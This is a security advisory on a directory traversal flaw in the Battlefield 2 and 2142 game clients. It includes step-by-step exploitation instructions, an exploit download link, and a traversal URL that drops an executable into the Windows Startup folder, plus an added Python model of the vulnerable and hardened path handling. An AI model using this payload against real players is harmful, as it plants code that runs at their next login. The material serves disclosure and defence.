EA Battlefield 2 and Battlefield 2142 Multiple Arbitrary File Upload Vulnerabilities
Source: aluigi@autistici.org   Author: Auriemma   Published: 2010-07-08

#######################################################################

Luigi Auriemma

Application: Refractor 2 engine
Games: Battlefield 2 <= 1.50 (aka 1.5.3153-802.0)
http://www.battlefield.ea.com/battlefield/bf2/
Battlefield 2142 <= 1.50 (aka 1.10.48.0)
http://battlefield.ea.com/battlefield/bf2142/
...
other games built on the same engine, such as Battlefield
Heroes, could be vulnerable as well
Platforms: Windows
Bug: client URLs directory traversal
Exploitation: remote, versus clients
Date: 29 Jun 2010
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


The Battlefield series is one of the best-known and most played game
series, built around multiplayer gaming.
The series is developed by DICE (http://www.dice.se) and published by
Electronic Arts.


#######################################################################

======
2) Bug
======


Each BF2 and BF2142 server has several fields in which the admin can
specify links to files and images, such as the sponsor logo and the
community logo.
The sponsor logo is fetched as soon as the client receives the server
list and selects the server with the mouse (a single click, not a join),
while the community logo is loaded when the client joins that server.

There are also other URLs, such as DemoDownloadURL, DemoIndexURL and
CustomMapsURL, which can be exploited once the client joins the
malicious server.

The client performs a very simple operation: it fetches the URL and
saves the file locally under its original name in one of the following
folders:
C:\Documents and Settings\USER\My Documents\Battlefield 2\LogoCache\SERVER
C:\Documents and Settings\USER\My Documents\Battlefield 2142\LogoCache\SERVER
where USER is the Windows account of the current user and SERVER is the
address of the web server; LogoCache becomes HttpCache when the URLs are
used for downloading demos and maps.

The vulnerability lies in the missing handling of the backslash
character: the file name taken from the URL can contain the classic
directory traversal pattern (..\), so a malicious server can drop
arbitrary files, such as executables, outside the cache directory on
the client.

Note that these URLs are loaded automatically and there does not seem
to be any way to disable the feature.


#######################################################################

===========
3) The Code
===========


http://www.exploit-db.com/sploits/bfonlywebs.zip

- launch: onlywebs.exe c:\malicious_file.exe
- start the server launcher and use the following string as the sponsor
and community logo URL:
http://SERVER/..\..\..\..\Start Menu\Programs\Startup\owned.exe
- save and start the server
- launch the client and go to the multiplayer menu
- when the refresh of the server list has finished, select or join the
malicious server
- the file owned.exe is now in the Startup folder of the client and will
be executed at the next login or reboot

Note that the server may not be visible if you run it on the same
machine as the client (127.0.0.1); in that case use another
computer/VM (a server or a UDP datapipe on port 29900).
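The client-side path derivation that the procedure above relies on, as an added example that is not part of the original advisory or of the game's code. It models, in Python, the behaviour described in section 2 (the file name is taken from the URL and joined under LogoCache\SERVER, with backslashes not treated as separators), resolves the result the way Windows would, and puts a hardened derivation beside it. The cache root, the host name SERVER and all function names are assumptions for illustration; Windows path semantics are simulated with string handling so the script runs on any host.

```python
"""Save-path derivation for the Refractor 2 sponsor/community logo URLs, modelled
in Python. Added example: not code from the advisory or from the game. Windows
path semantics are simulated with string handling so it runs on any host; the
cache root, the host name SERVER and the function names are assumptions."""
from urllib.parse import unquote

# Per-user cache directory named in the advisory (Battlefield 2, Windows XP layout).
CACHE_ROOT = r"C:\Documents and Settings\USER\My Documents\Battlefield 2\LogoCache"

# The sponsor-logo URL from section 3 of the advisory: four "..\" climbs.
EVIL_URL = r"http://SERVER/..\..\..\..\Start Menu\Programs\Startup\owned.exe"


def split_url(url):
    """Minimal URL split into (host, path); enough for the http:// URLs used here."""
    _scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return host, slash + path


def normalize_windows_path(path):
    """Collapse '.' and '..' segments as the Windows file APIs do, treating both
    '\\' and '/' as separators. Used to show where a path actually lands."""
    drive, rest = (path[:2], path[2:]) if len(path) > 1 and path[1] == ":" else ("", path)
    out = []
    for seg in rest.replace("/", "\\").split("\\"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return drive + "\\" + "\\".join(out)


def vulnerable_save_path(url):
    """Model of the behaviour in the advisory: the text after the last '/' is the
    file name and is joined under LogoCache\\SERVER. A backslash is not treated
    as a separator, so every '..\\' survives into the "file name"."""
    host, path = split_url(url)
    filename = path.rsplit("/", 1)[-1]
    return f"{CACHE_ROOT}\\{host}\\{filename}"


def checked_component(name):
    """Accept a single plain path component only: no separators, no drive colon,
    no control characters, not '.' or '..', and no trailing dots or spaces
    (which Win32 silently strips, so 'owned.exe.' would become 'owned.exe')."""
    if (name in ("", ".", "..") or any(c in name for c in "\\/:")
            or any(ord(c) < 32 for c in name) or name != name.rstrip(". ")):
        raise ValueError(f"unsafe path component derived from URL: {name!r}")
    return name


def hardened_save_path(url):
    """Treat '/' and '\\' alike, keep only the base name, validate each component
    that ends up in the path, and confirm the result stays under the cache root."""
    host, path = split_url(url)
    host = checked_component(unquote(host))
    # Percent-decode before splitting so %5C cannot smuggle a backslash past it.
    filename = checked_component(unquote(path).replace("\\", "/").rsplit("/", 1)[-1])
    server_dir = normalize_windows_path(f"{CACHE_ROOT}\\{host}")
    final = normalize_windows_path(f"{server_dir}\\{filename}")
    # Belt and braces: the canonical path must still be inside LogoCache\SERVER.
    if not final.lower().startswith(server_dir.lower() + "\\"):
        raise ValueError(f"resolved path escapes the cache directory: {final}")
    return final


def rejected(url):
    """True if the hardened derivation refuses the URL."""
    try:
        hardened_save_path(url)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    naive = vulnerable_save_path(EVIL_URL)
    print("vulnerable client writes to:", naive)
    print("which Windows resolves to  :", normalize_windows_path(naive))
    print("hardened client writes to  :", hardened_save_path(EVIL_URL))
```

Run stand-alone, the vulnerable derivation for the advisory's URL resolves to the user's Start Menu\Programs\Startup folder, which is exactly why owned.exe runs at the next login; the hardened derivation keeps the same download inside LogoCache\SERVER as a plain owned.exe. The host name is validated with the same component rules as the file name, so a host:port URL would need its own directory-name mapping before this check; that choice is the example's, not the game's.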


#######################################################################

======
4) Fix
======


No fix.


#######################################################################

